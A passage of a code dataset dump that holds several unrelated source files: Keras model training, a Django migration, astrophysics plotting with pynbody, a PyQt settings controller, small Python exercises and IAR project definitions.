include_top=False, pooling = 'avg')\n    #base_model = ResNet50(include_top=False, weights=None, input_shape=(image_size, image_size, 3))\n\nx = base_model.output\nx = Flatten()(x)\n#x = GlobalAveragePooling2D()(x)\nx = Dense(1024, activation='relu', name=\"dense_feature\")(x)\n#predictions = [Dense(n, activation='softmax', name=m)(x) for m,n in classes.items()]\npredictions = [Dense(n, activation='sigmoid', name=m)(x) for m,n in classes.items()]\nmodel = Model(inputs=base_model.input, outputs= predictions)\n\nif gpus_num != 1:\n    #with tf.device(\"/cpu:0\"):\n    #model = Model(inputs=base_model.input, outputs= predictions)\n    model = multi_gpu_model(model, gpus=gpus_num)\n#model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n\n#Loading the dataset: train_x (each row is an image array) and train_y (attributes per image)\ndata_atten = pd.read_csv(r'../test.csv')\ndata_atten = data_atten.set_index('0')\ndata_train = open(r'/home/anhaoran/data/zero-shot-tianchi/dataset_B/DatasetB_20180919/train.txt')\ndata_train = data_train.readlines()\nprint(data_train[0])\npath = r'/home/anhaoran/data/zero-shot-tianchi/dataset_B/DatasetB_20180919/train/'\nlength = len(data_train)\ntrain_x = np.zeros((length, image_size, image_size, 3))\ntrain_y = np.zeros((length, 25))\nfor i in range(length):\n    m,n = data_train[i].split()\n    #img = image.load_img(path + m)\n    img = image.load_img(path + m, target_size=(image_size, image_size, 3))\n    train_x[i] = image.img_to_array(img)\n    train_y[i] = data_atten.loc[n]\n    \n# Data augmentation for pre-processing\nheavy_augmentation = True\nif heavy_augmentation:\n    datagen = ImageDataGenerator(\n        featurewise_center=False,\n        samplewise_center=False,\n        featurewise_std_normalization=False,\n        samplewise_std_normalization=False,\n        zca_whitening=False,\n        rotation_range=45,\n        width_shift_range=0.25,\n        height_shift_range=0.25,\n        horizontal_flip=True,\n        vertical_flip=False,\n        zoom_range=0.5,\n        channel_shift_range=0.5,\n        fill_mode='nearest')\nelse:\n    datagen = ImageDataGenerator(\n        featurewise_center=False,\n        samplewise_center=False,\n        featurewise_std_normalization=False,\n        samplewise_std_normalization=False,\n        zca_whitening=False,\n        rotation_range=0,\n        width_shift_range=0.125,\n        height_shift_range=0.125,\n        horizontal_flip=True,\n        vertical_flip=False,\n        fill_mode='nearest')\ndatagen.fit(train_x)\n\nprint(\"The shape of the X_train is: \", train_x.shape)\nprint(\"The shape of the y_train is: \", train_y.shape)\n \n\n#Train the model\n\n#model.load_weights(model_dir + 'inceptionv3_2018-08-26_epoch50_7.30.hdf5')\n#\"\"\"\n#Convert train_y to a dictionary keyed by attribute name\ny_train = array2dic(train_y, classes)\nif args.weights != '':\n    model.load_weights(args.weights, by_name=True)\nmodel.fit(train_x, y_train,\n          epochs = nb_epoch,\n          batch_size = batch_size,\n          validation_split = 0.3,\n          callbacks = [checkpointer, csvlog])\n#\"\"\"\nX_train, X_test, y_train, y_test = train_test_split(train_x,train_y, test_size=0.3, random_state=0)\n\"\"\"\nConvert the train_y splits to dictionaries\ny_train = array2dic(y_train, classes)\ny_test = array2dic(y_test, classes)\ntrain_generator = datagen.flow(X_train, y_train, batch_size=batch_size) ---> must be ndarrays\nval_generator = datagen.flow(X_test, y_test, batch_size=batch_size) ---> must be ndarrays\n\nmodel.fit_generator(generate_batch_data(X_train, y_train, batch_size * gpus_num, classes),\n                    steps_per_epoch = int(X_train.shape[0] / (batch_size * 
gpus_num)),\n                    epochs = nb_epoch,\n                    validation_data = generate_batch_data(X_test, y_test, batch_size * gpus_num),\n                    validation_steps = int(X_test.shape[0] / (batch_size * gpus_num)),\n                    callbacks = [checkpointer, csvlog])\n\"\"\"\nmodel.save(model_dir + model_name + '_baseline_model.h5')\nnow_time = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\nos.system('mv nohup.out ' + model_dir + 'nohup_' + now_time + '.out')\n","sub_path":"py/train_model_attribute.py","file_name":"train_model_attribute.py","file_ext":"py","file_size_in_byte":11689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"8752258","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('postproduccion', '0009_video_archivado'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Coleccion',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('titulo', models.CharField(max_length=100, verbose_name='T\\xedtulo de Colecci\\xf3n')),\n                ('autor', models.CharField(default=b'', max_length=255, verbose_name='Responsable')),\n                ('email', models.EmailField(default=b'', max_length=254, verbose_name='Email del responsable')),\n                ('tipoVideo', models.CharField(default=b'UNK', max_length=3, verbose_name=b'Tipo Producci\\xc3\\xb3n', choices=[(b'UNK', 'Sin definir'), (b'PIL', 'P\\xedldora formativa'), (b'VID', 'Videotutoriales'), (b'EDU', 'V\\xeddeos Educativos'), (b'EVE', 'Grabaci\\xf3n de Eventos'), (b'OTR', 'Otros')])),\n                ('objecto_aprendizaje', models.BooleanField(default=True, verbose_name='Objeto de aprendizaje')),\n                ('fecha', models.DateTimeField(null=True, verbose_name='Fecha de creaci\\xf3n', blank=True)),\n            ],\n        ),\n        migrations.AddField(\n            model_name='video',\n            name='coleccion',\n            field=models.ForeignKey(blank=True, to='postproduccion.Coleccion', null=True),\n        ),\n    ]\n","sub_path":"postproduccion/migrations/0010_auto_20160520_1353.py","file_name":"0010_auto_20160520_1353.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"196276015","text":"# This script makes face-on and edge-on gas-density images of ChaNGa N-body\n# simulations and overplots the virial radius\n\n\n# N. Nicole Sanchez -- July 5, 2017\n# U. W. Seattle -- Nbody Shop\nimport matplotlib.pyplot as plt\n#import matplotlib.cm as cm\nimport numpy as np\nimport pynbody\nimport sys\n\nplt.rc('font', size=12, family='serif', style='normal', variant='normal', stretch='normal', weight='normal')\nplt.rc('xtick', labelsize=12)\nplt.rc('xtick.major', size=6, width=1)\nplt.rc('lines', lw=2)\nplt.rc('axes', lw=1, labelsize=12)\n\nif len(sys.argv) == 1:\n    print('No galaxy selected. 
Current options: P0, GM1, GM4, GM5, GM6, GM7')\n    print('Syntax: \"GM_xygasplots.py GM1\"')\n    quit()\nelse:\n    if (str(sys.argv[1]) == 'P0'):\n        sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243.1536g1bwK1BH/pioneer50h243.1536gst1bwK1BH.004096')\n    elif (str(sys.argv[1]) == 'GM1'):\n        sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM1.1536gs1bwK1BH/pioneer50h243GM1.1536gst1bwK1BH.004096')\n    elif (str(sys.argv[1]) == 'GM4'):\n        sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM4.1536gst1bwK1BH/OLD/pioneer50h243GM4.1536gst1bwK1BH.004096')\n    elif (str(sys.argv[1]) == 'GM5'):\n        sim = pynbody.load('/nobackup/nnsanche/pioneer50h243GM5.1536gst1bwK1BH/pioneer50h243GM5.1536gst1bwK1BH.004096')\n    elif (str(sys.argv[1]) == 'GM6'):\n        sim = pynbody.load('/nobackupp8/fgoverna/pioneer50h243GM6.1536gst1bwK1BH/pioneer50h243GM6.1536gst1bwK1BH.004096')\n    elif (str(sys.argv[1]) == 'GM7'):\n        sim = pynbody.load('/nobackup/nnsanche/pioneer50h243GM7.1536gst1bwK1BH/pioneer50h243GM7.1536gst1bwK1BH.004096')\n\n    else :\n        print('Not a valid option. Current options: P0, GM1, GM4, GM5, GM6, GM7')\n        print('Syntax: \"GM_xygasplots.py GM1\"')\n        quit() \n\n    name = str(sys.argv[1])\n    print(name+' simulation at z = ','%.2f' % sim.properties['z'] )\n    R_vir = np.loadtxt('../'+name+'/'+name+'_mainhalo.stat',dtype=float,skiprows=1,usecols=6,unpack=True)\n\nh = sim.halos()\nh1 = h[1]\n\n# for GM7, take Rvir from the halo catalog (h1) instead of the .stat file;\n# h1 must be defined before this override is applied\nif (str(sys.argv[1]) == 'GM7'):\n    R_vir = h1.properties['Rvir']\n\nprint('Virial radius:',float(R_vir))\nR_vir = float(R_vir)\n\npynbody.analysis.halo.center(h1,mode='ssc')\npynbody.analysis.angmom.faceon(h1)\nsim.physical_units()\n\nm_h = 1.6733 * 10**-24 # g\nsim.g['rho_in_nhcm'] = sim.g['rho'].in_units('g cm**-3') / m_h\n\n\n# Plotting face on\npynbody.plot.sph.image(sim.g, qty='rho_in_nhcm' , width=2*270, cmap='jet', show_cbar=False, vmin=10**-6, vmax=10**1)\nfig = plt.gcf()\nax = fig.gca()\n\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='white',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'n$_H$ [cm$^{-3}$]')\nplt.text(-245,220,name, color='White')\nplt.text(185,-240,'z = 0',color='White')\n#plt.xlim(275,275)\n#plt.ylim(275,275)\nplt.savefig(name+'_gasdensity.pdf')\nplt.show()\nplt.clf()\n\nquit()\n# NOTE: the quit() above stops the script here, so the temperature and metal maps below are currently skipped\n# Plotting temperature map\npynbody.plot.sph.image(sim.g, qty='temp', width=2*R_vir, cmap='jet', show_cbar=False,vmin=10**3, vmax=10**7)\nfig = plt.gcf()\nax = fig.gca()\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='Black',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'T [K]')\nplt.text(-245,220,name, color='Black')\nplt.text(185,-240,'z = 0',color='Black')\nplt.savefig(name+'_gastemp.pdf')\nplt.show()\n\n# Plotting metal mass fraction\npynbody.plot.sph.image(sim.g, qty='metals', width=2*R_vir, cmap='jet', show_cbar=False,vmin=10**-6, vmax=5*10**-1)\nfig = plt.gcf()\nax = fig.gca()\n\ncircle2 = plt.Circle((0.0, 0.0), R_vir, color='Black',fill=False,linestyle='--')\nax.add_artist(circle2)\ncbar = plt.colorbar()\ncbar.set_label(r'metal mass fraction')\nplt.text(-245,220,name, color='Black')\nplt.text(185,-240,'z = 0',color='Black')\nplt.savefig(name+'_gasmetalfrac.pdf')\nplt.show()\n","sub_path":"properties/H1_xygasplots.py","file_name":"H1_xygasplots.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"515548582","text":"\"\"\"This module handles all operations involving the user's settings.\"\"\"\n\nimport json\nfrom enum import Enum\nfrom os import path\nfrom 
PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom ui import SettingsTab\nimport ManageDB\nfrom Constants import *\nimport GeneralUtils\nfrom GeneralUtils import JsonModel\n\n\nclass Setting(Enum):\n    \"\"\"An enum of all settings\"\"\"\n    YEARLY_DIR = 0\n    OTHER_DIR = 1\n    REQUEST_INTERVAL = 2\n    REQUEST_TIMEOUT = 3\n    CONCURRENT_VENDORS = 4\n    CONCURRENT_REPORTS = 5\n    USER_AGENT = 6\n\n\nclass SettingsModel(JsonModel):\n    \"\"\"This holds the user's settings.\n\n    :param show_debug_messages: Whether debug messages should be printed to the console.\n    :param yearly_directory: The directory where yearly reports are saved. Yearly reports are reports that include all\n        the available data for a year.\n    :param other_directory: The default directory where non-yearly reports are saved.\n    :param request_interval: The time to wait between each report request, per vendor.\n    :param request_timeout: The time to wait before timing out a connection (seconds).\n    :param concurrent_vendors: The max number of vendors to work on at a time.\n    :param concurrent_reports: The max number of reports to work on at a time, per vendor.\n    :param user_agent: The user-agent that's included in the header when making requests.\n    :param default_currency: The currency shown first in cost-related dropdowns.\n    \"\"\"\n    def __init__(self, show_debug_messages: bool, yearly_directory: str, other_directory: str, request_interval: int,\n                 request_timeout: int, concurrent_vendors: int, concurrent_reports: int, user_agent: str,\n                 default_currency: str):\n        self.show_debug_messages = show_debug_messages\n        self.yearly_directory = path.abspath(yearly_directory) + path.sep\n        self.other_directory = path.abspath(other_directory) + path.sep\n        self.request_interval = request_interval\n        self.request_timeout = request_timeout\n        self.concurrent_vendors = concurrent_vendors\n        self.concurrent_reports = concurrent_reports\n        self.user_agent = user_agent\n        self.default_currency = default_currency\n\n    @classmethod\n    def from_json(cls, json_dict: dict):\n        show_debug_messages = json_dict[\"show_debug_messages\"]\\\n            if \"show_debug_messages\" in json_dict else SHOW_DEBUG_MESSAGES\n        yearly_directory = json_dict[\"yearly_directory\"]\\\n            if \"yearly_directory\" in json_dict else YEARLY_DIR\n        other_directory = json_dict[\"other_directory\"]\\\n            if \"other_directory\" in json_dict else OTHER_DIR\n        request_interval = int(json_dict[\"request_interval\"])\\\n            if \"request_interval\" in json_dict else REQUEST_INTERVAL\n        request_timeout = int(json_dict[\"request_timeout\"])\\\n            if \"request_timeout\" in json_dict else REQUEST_TIMEOUT\n        concurrent_vendors = int(json_dict[\"concurrent_vendors\"])\\\n            if \"concurrent_vendors\" in json_dict else CONCURRENT_VENDORS\n        concurrent_reports = int(json_dict[\"concurrent_reports\"])\\\n            if \"concurrent_reports\" in json_dict else CONCURRENT_REPORTS\n        user_agent = json_dict[\"user_agent\"]\\\n            if \"user_agent\" in json_dict else USER_AGENT\n        default_currency = json_dict[\"default_currency\"]\\\n            if \"default_currency\" in json_dict else DEFAULT_CURRENCY\n\n        return cls(show_debug_messages, yearly_directory, other_directory, request_interval, request_timeout,\n                   concurrent_vendors, concurrent_reports, user_agent, default_currency)\n\n\nclass SettingsController(QObject):\n    \"\"\"Controls the Settings tab\n\n    :param settings_widget: The settings widget.\n    :param settings_ui: The UI for settings_widget.\n    \"\"\"\n    settings_changed_signal = pyqtSignal(SettingsModel)\n\n    def __init__(self, settings_widget: QWidget, settings_ui: SettingsTab.Ui_settings_tab):\n        # region General\n        super().__init__()\n        self.settings_widget = settings_widget\n\n        json_string = 
GeneralUtils.read_json_file(SETTINGS_FILE_DIR + SETTINGS_FILE_NAME)\n        json_dict = json.loads(json_string)\n        self.settings = SettingsModel.from_json(json_dict)\n\n        self.show_debug_checkbox = settings_ui.show_debug_check_box\n        self.show_debug_checkbox.setChecked(self.settings.show_debug_messages)\n        # endregion\n\n        # region Reports\n        self.yearly_dir_edit = settings_ui.yearly_directory_edit\n        self.other_dir_edit = settings_ui.other_directory_edit\n        self.request_interval_spin_box = settings_ui.request_interval_spin_box\n        self.request_timeout_spin_box = settings_ui.request_timeout_spin_box\n        self.concurrent_vendors_spin_box = settings_ui.concurrent_vendors_spin_box\n        self.concurrent_reports_spin_box = settings_ui.concurrent_reports_spin_box\n        self.user_agent_edit = settings_ui.user_agent_edit\n\n        self.yearly_dir_edit.setText(self.settings.yearly_directory)\n        self.other_dir_edit.setText(self.settings.other_directory)\n        self.request_interval_spin_box.setValue(self.settings.request_interval)\n        self.request_timeout_spin_box.setValue(self.settings.request_timeout)\n        self.concurrent_vendors_spin_box.setValue(self.settings.concurrent_vendors)\n        self.concurrent_reports_spin_box.setValue(self.settings.concurrent_reports)\n        self.user_agent_edit.setText(self.settings.user_agent)\n\n        settings_ui.yearly_directory_button.clicked.connect(\n            lambda: self.on_directory_setting_clicked(Setting.YEARLY_DIR))\n        settings_ui.other_directory_button.clicked.connect(\n            lambda: self.on_directory_setting_clicked(Setting.OTHER_DIR))\n\n        # Reports Help Messages\n        settings_ui.yearly_directory_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"This is where the calendar-year reports will be saved\"))\n        settings_ui.other_directory_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"This is where the special and non-calendar-year date range reports will \"\n                                              \"be saved by default\"))\n        settings_ui.request_interval_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"The number of seconds the program will wait between sending each report \"\n                                              \"request to a given vendor\"))\n        settings_ui.request_timeout_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"The number of seconds the program will allow a vendor to respond to \"\n                                              \"each report request before canceling it\"))\n        settings_ui.concurrent_vendors_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"The maximum number of vendors to work on at the same time. \"\n                                              \"If set too high, the UI might freeze while fetching reports but the \"\n                                              \"fetch process will continue\"))\n        settings_ui.concurrent_reports_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"The maximum number of reports to work on at the same time (per vendor). \"\n                                              \"If set too high, the UI might freeze while fetching reports but the \"\n                                              \"fetch process will continue\"))\n        settings_ui.user_agent_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"How the program identifies itself to the SUSHI servers. Some vendors will \"\n                                              \"reject some particular user agents. Only change this if there is a \"\n                                              \"known problem as it will affect all requests to all vendors. \"\n                                              \"See Help for more information.\"))\n        settings_ui.default_currency_help_button.clicked.connect(\n            lambda: GeneralUtils.show_message(\"The currency shown first in the Costs pulldown and also by Visual to \"\n                                              \"label the local currency in the spreadsheets generated with the Cost \"\n                                              \"Ratio option. 
Note: This doesn't have to be one of the pre-loaded \"\n                                              \"currencies.\"))\n\n        # endregion\n\n        # region Costs\n        self.default_currency_combobox = settings_ui.settings_costs_default_currency_combobox\n        self.default_currency_combobox.addItems(CURRENCY_LIST)\n        self.default_currency_combobox.setCurrentText(self.settings.default_currency)\n        # endregion\n\n        # region Search\n        # set up rebuild database button\n        self.is_rebuilding_database = False\n        self.update_database_dialog = ManageDB.UpdateDatabaseProgressDialogController(self.settings_widget)\n        self.rebuild_database_button = settings_ui.settings_rebuild_database_button\n        self.rebuild_database_button.clicked.connect(self.on_rebuild_database_clicked)\n        # endregion\n\n        settings_ui.save_button.clicked.connect(self.on_save_button_clicked)\n\n    def on_directory_setting_clicked(self, setting: Setting):\n        \"\"\"Handles the signal emitted when a choose folder button is clicked\n\n        :param setting: The setting to be changed\n        \"\"\"\n        dir_path = GeneralUtils.choose_directory()\n        if dir_path:\n            if setting == Setting.YEARLY_DIR:\n                self.yearly_dir_edit.setText(dir_path)\n            elif setting == Setting.OTHER_DIR:\n                self.other_dir_edit.setText(dir_path)\n\n    def on_save_button_clicked(self):\n        \"\"\"Handles the signal emitted when the save button is clicked\"\"\"\n        self.update_settings()\n        self.save_settings_to_disk()\n        self.settings_changed_signal.emit(self.settings)\n        GeneralUtils.show_message(\"Changes saved!\")\n\n    def on_rebuild_database_clicked(self):\n        \"\"\"Rebuilds the database when the rebuild database button is clicked\"\"\"\n        if not self.is_rebuilding_database:  # check if already running\n            if GeneralUtils.ask_confirmation('Are you sure you want to rebuild the database?'):\n                self.is_rebuilding_database = True\n                self.update_database_dialog.update_database(ManageDB.get_all_report_files() +\n                                                            ManageDB.get_all_cost_files(),\n                                                            True)\n                self.is_rebuilding_database = False\n        else:\n            if self.settings.show_debug_messages: print('Database is already being rebuilt')\n\n    def update_settings(self):\n        \"\"\"Updates the app's settings using the values entered on the UI\"\"\"\n        self.settings.show_debug_messages = self.show_debug_checkbox.isChecked()\n        self.settings.yearly_directory = self.yearly_dir_edit.text()\n        self.settings.other_directory = self.other_dir_edit.text()\n        self.settings.request_interval = self.request_interval_spin_box.value()\n        self.settings.request_timeout = self.request_timeout_spin_box.value()\n        self.settings.concurrent_vendors = self.concurrent_vendors_spin_box.value()\n        self.settings.concurrent_reports = self.concurrent_reports_spin_box.value()\n        self.settings.user_agent = self.user_agent_edit.text()\n        self.settings.default_currency = self.default_currency_combobox.currentText()\n\n    def save_settings_to_disk(self):\n        \"\"\"Saves all settings to disk\"\"\"\n        json_string = json.dumps(self.settings, default=lambda o: o.__dict__)\n        GeneralUtils.save_json_file(SETTINGS_FILE_DIR, SETTINGS_FILE_NAME, json_string)","sub_path":"Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"401183469","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 25 13:07:42 2018\n\n@author: bianl\n\"\"\"\n\ndef sum_digits(s):\n    \"\"\" \n    assumes s is a string\n    \n    Returns an int that is the sum of all of the digits in s.\n    \n    If there are no digits in s it raises a ValueError exception. 
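For example, sum_digits(\"a1b2\") returns 3, while sum_digits(\"a;d\") raises a ValueError.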
\n    \"\"\"\n    assert type(s) is str\n    total = 0\n    found_digit = False\n    for ch in s:\n        try:\n            num = int(ch)\n        except ValueError:\n            continue\n        else:\n            total += num\n            found_digit = True\n    if not found_digit:\n        raise ValueError('no digits in input string')\n    else:\n        return total\n\n\nprint(sum_digits(\"a;d\"))","sub_path":"Introduction to Computer Science and Programming Using Python/Finalterm/Ft_problem3.py","file_name":"Ft_problem3.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"145404619","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n#reading data\ndata = pd.read_csv('penguins.csv')\n#selecting columns that we want\ndata = data [['species' , 'bill_length_mm','bill_depth_mm']]\n#shuffling data\ndata = data.sample(frac=1).reset_index(drop=True)\n\ndata['species']= data['species'].astype('category')\n#dropping null values\ndata = data.dropna()\n#changing categorical variable to numerical\ndata['species']= data['species'].cat.codes\n#Adelie = 0, Chinstrap = 1, Gentoo = 2\n#splitting target and features\ntarget = data['species']\nfeatures = data[['bill_length_mm','bill_depth_mm']]\n#normalization\nfeatures = (features - features.min())/(features.max() - features.min())\n#changing target and features type to numpy array\ntarget = target.to_numpy()\nfeatures = features.to_numpy()\n#splitting train and test sets\ny_train = target[:300]\ny_test = target[300:]\nx_train = features[:300]\nx_test = features[300:]\n#selecting 2 categories (Gentoo and Adelie)\nx_train_a = x_train[y_train != 1]\ny_train_a = y_train[y_train != 1]\nx_test_a = x_test[y_test != 1]\ny_test_a = y_test[y_test != 1]\n#add a column of ones (bias term) to the features\nx_train_a = np.append(np.ones((x_train_a.shape[0],1)) , x_train_a , axis = 1)\nx_test_a = np.append(np.ones((x_test_a.shape[0],1)) , x_test_a , axis = 1)\n#negate the features of class-2 samples so a single inequality covers both classes\nx_train_a[y_train_a == 2] = x_train_a[y_train_a == 2]*-1\n\nb = np.ones((x_train_a.shape[0],1))\n#gradient descent\n#converge_time stores each learning rate together with the number of iterations it needed to converge\nconverge_time = []\n#we start with learning rate = 0.0001 and in each step we add 0.0001 to it\nlearning_rate = .0001\nmin_fail = None\n#first loop is for testing different learning rates\nfor j in range(80): \n    a = np.zeros((3,1))\n    #this loop executes gradient descent\n    for i in range(2000):\n        a = a - learning_rate * (x_train_a.T @ (x_train_a @ a - b))\n        #condition for convergence\n        if np.sum(np.power(x_train_a @ a - b , 2)) <27 :\n            converge_time.append([learning_rate,i])\n            break\n    #check whether this learning rate failed to converge\n    if np.sum(np.power(x_train_a @ a - b , 2)) > 27:\n        min_fail = learning_rate\n        break\n    learning_rate+=.0001\n    \n#plotting learning rate vs number of iterations needed for convergence\nprint('minimum learning rate that fails to converge:' , min_fail)\nplt.plot([x[0] for x in converge_time ] , [x[1] for x in converge_time])\nplt.xlabel('learning rate')\nplt.ylabel('number of iterations for convergence')\nplt.savefig('6b.png')\n\n","sub_path":"3/codes/P6/b/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"388587144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 3 22:48:29 2021\r\n\r\n@author: user\r\n\"\"\"\r\n\r\ndef sift(li,low,high):\r\n    i=low\r\n    j=2*i+1\r\n    tmp=li[low]\r\n    while j<=high:\r\n        #point j at the smaller child (this is a min-heap)\r\n        if j+1<=high and li[j+1]<li[j]:\r\n            j=j+1\r\n        if li[j]<tmp:\r\n            #the child is smaller: move it up and keep sinking\r\n            li[i]=li[j]\r\n            i=j\r\n            j=2*i+1\r\n        else:\r\n            break\r\n    li[i]=tmp\r\n\r\ndef topk(li,k):\r\n    #keep the k largest items of li in a min-heap of size k\r\n    heap=li[0:k]\r\n    for i in range(k//2-1,-1,-1):\r\n        sift(heap, i, k-1)\r\n    for i in range(k,len(li)):\r\n        if li[i]>heap[0]:\r\n            heap[0]=li[i]\r\n            
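#re-sift so the root is again the smallest of the k kept items\r\n            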
sift(heap, 0, k-1)\r\n for i in range (k-1,-1,-1):\r\n heap[0],heap[i]=heap[i],heap[0]\r\n sift(heap, 0, i-1)\r\n return heap","sub_path":"topk_answer.py","file_name":"topk_answer.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"515548582","text":"# Copyright 2014 0xc0170\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nclass IARDefinitions():\n\n def get_mcu_definition(self, name):\n \"\"\" If MCU found, returns its definition dic, error otherwise. \"\"\"\n try:\n return self.mcu_def[name]\n except KeyError:\n raise RuntimeError(\n \"Mcu was not recognized for IAR. Please check mcu_def dictionary.\")\n\n # MCU definitions which are currently supported. Add a new one, define a name as it is\n # in IAR, create an empty project for that MCU, open the project file (ewp) in any text\n # editor, find out the values of SelectEditMenu, CoreOrChip and FPU if\n # it's not disabled (=0)\n mcu_def = {\n 'LPC1768': {\n 'OGChipSelectEditMenu': {\n 'state': 'LPC1768\tNXP LPC1768',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n }\n },\n 'MKL25Z128xxx4': {\n 'OGChipSelectEditMenu': {\n 'state': 'MKL25Z128xxx4\tFreescale MKL25Z128xxx4',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n }\n },\n 'STM32F401xB': {\n 'OGChipSelectEditMenu': {\n 'state': 'STM32F401xB\tST STM32F401xB',\n },\n 'OGCoreOrChip': {\n 'state': 1,\n },\n 'FPU': {\n 'state': 5,\n },\n },\n }\n\n iar_settings = {\n 'Variant': {\n 'state': 0,\n },\n 'GEndianMode': { # [General Options][Target] Endian mode\n 'state': 0,\n },\n 'Input variant': {\n 'version': 0,\n 'state': 0,\n },\n 'Output variant': {\n 'state': 1,\n },\n 'GOutputBinary': { # [General Options][Output] Executable or library\n 'state': 0, # 1 - library, 0 - executable\n },\n 'FPU': {\n 'version': 2,\n 'state': 0,\n },\n 'GRuntimeLibSelect': { # [General Options] Use runtime library\n 'version': 0,\n 'state': 0, # 0 - none, 1 - normal, 2 - full, 3 - custom\n },\n 'GRuntimeLibSelectSlave': {\n 'version': 0,\n 'state': 0,\n },\n 'GeneralEnableMisra': { # [General Options] Enable Misra-C\n 'state': 0,\n },\n 'GeneralMisraVerbose': { # [General Options] Misra verbose\n 'state': 0,\n },\n 'OGChipSelectEditMenu': { # [General Options] Select MCU (be aware, tabs are needed in some cases)\n 'state': 0,\n },\n 'GenLowLevelInterface': { # [General Options] Use semihosting\n # [General Options] 0 - none, 1 - semihosting, 2 - IAR breakpoint\n 'state': 0,\n },\n 'GEndianModeBE': {\n 'state': 0,\n },\n 'OGBufferedTerminalOutput': { # [General Options] Buffered terminal output\n 'state': 0,\n },\n 'GenStdoutInterface': { # [General Options] Stdout/err\n 'state': 0, # [General Options] 0 - semihosting, 1 - SWD\n },\n 'GeneralMisraVer': {\n 'state': 0,\n },\n 'GFPUCoreSlave': {\n 'state': 0,\n },\n 'GBECoreSlave': {\n 'state': 0,\n },\n 'OGUseCmsis': { # [General Options][Lib configuration] Use CMSIS Lib\n 'state': 0,\n },\n 'OGUseCmsisDspLib': { # [General Options][Lib configuration] Use CMSIS DSP Lib, 
only valid if CMSIS Lib is selected\n            'state': 0,\n        },\n        'CCPreprocFile': {\n            'state': 0,\n        },\n        'CCPreprocComments': {\n            'state': 0,\n        },\n        'CCPreprocLine': {\n            'state': 0,\n        },\n        'CCListCFile': {  # [C/C++ Compiler][Output] Output list file\n            'state': 0,\n        },\n        'CCListCMnemonics': {\n            'state': 0,\n        },\n        'CCListCMessages': {\n            'state': 0,\n        },\n        'CCListAssFile': {  # [C/C++ Compiler][Output] Output assembler file\n            'state': 0,\n        },\n        'CCListAssSource': {\n            'state': 0,\n        },\n        'CCEnableRemarks': {\n            'state': [],\n        },\n        'CCDiagSuppress': {\n            'state': '',\n        },\n        'CCDiagRemark': {\n            'state': '',\n        },\n        'CCDiagWarning': {\n            'state': '',\n        },\n        'CCDiagError': {\n            'state': '',\n        },\n        'CCObjPrefix': {  # Generate object files for C/C++\n            'state': 1,\n        },\n        'CCAllowList': {  # [C/C++ Compiler] Enable transformations (Optimizations)\n            'version': 1,\n            # Each bit enables one optimization setting; for example, the second bit\n            # is for loop unrolling\n            'state': 1111111,\n        },\n        'CCDebugInfo': {  # [C/C++ Compiler] Generate debug information\n            'state': 1,\n        },\n        'IEndianMode': {\n            'state': 1,\n        },\n        'IProcessor': {\n            'state': 1,\n        },\n        'IExtraOptionsCheck': {\n            'state': 0,\n        },\n        'IExtraOptions': {\n            'state': 0,\n        },\n        'CCLangConformance': {  # [C/C++ Compiler] Language conformance\n            # 0 - standard with IAR extensions, 1 - standard, 2 - strict\n            'state': 0,\n        },\n        'CCSignedPlainChar': {  # [C/C++ Compiler] Plain char\n            'state': 1,  # 0 - signed, 1 - unsigned\n        },\n        'CCRequirePrototypes': {  # [C/C++ Compiler] Require 